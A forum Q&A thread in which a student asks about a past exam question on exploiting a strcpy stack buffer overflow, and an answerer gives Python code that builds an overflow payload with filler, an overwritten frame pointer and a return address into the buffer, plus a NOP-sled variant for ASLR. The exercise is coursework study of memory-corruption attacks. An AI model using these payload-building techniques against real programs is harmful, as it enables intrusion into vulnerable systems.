0

I am reviewing for my exams next week, I have come across a past question.

void func(char * arg)
{
     char buf[32];
     strcpy(buf, arg);
}

Suppose;

  • No defenses at all
  • buf begins at 0xbffebfb0
  • (gdb) x/2wx $ebp 0xbffebfd8: 0xbffec068 0x08048fe1

a) you want to run a payload that is 24 bytes long, what bytes should be copied into the buffer for an exploit? (I would want to fill in '\x90' for the 24 bytes)

b) If ASLR is enabled, which offsets the stack by 0-15 bytes each time it runs, what payload (describe in python print statement) will always get the shellcode above to execute? or why is such a payload impossible?

GOTO 0
  • 42,323
  • 22
  • 125
  • 158
Matt Dathew
  • 135
  • 1
  • 12

1 Answers1

0

a) The output from gdb is not consistent with normal compilation of this function: there should be 32 bytes difference between the top of the buffer and ebp. However, 0xbffebfd8 - 0xbffebfb0 is 0x28 (40 bytes). I'm going to assume this is incorrect, since the only local variable is buf.

def hack(payload='\x90'*24):
    filler = 'A'*(32 - len(payload)) # for rest of buffer
    frame_ptr = struct.pack("<I", 0x42424242)
    ret = struct.pack("<I", 0xbffebfb0) # jump to top of buffer
    return payload + filler + frame_ptr + ret + '\0'

b) If the stack value changes by 0-15 bytes each time, you would need to insert a 15-byte NOP sled.

32 (buffer length) + 4 (saved frame pointer) = 36 36 - 15 = 21 bytes

This is not sufficient room to fit the 24-byte payload. If the above strange gdb output is correct, then it is enough room.

print ("\x90"*15 + # nop sled
       payload +
       'A'*(40 - len(payload) - 15) + # filler
       struct.pack("<I", 0x42424242) + # saved frame pointer
       struct.pack("<I", 0xbffebfb0) + # saved return address
       '\0' )
Jesse Spears
  • 136
  • 9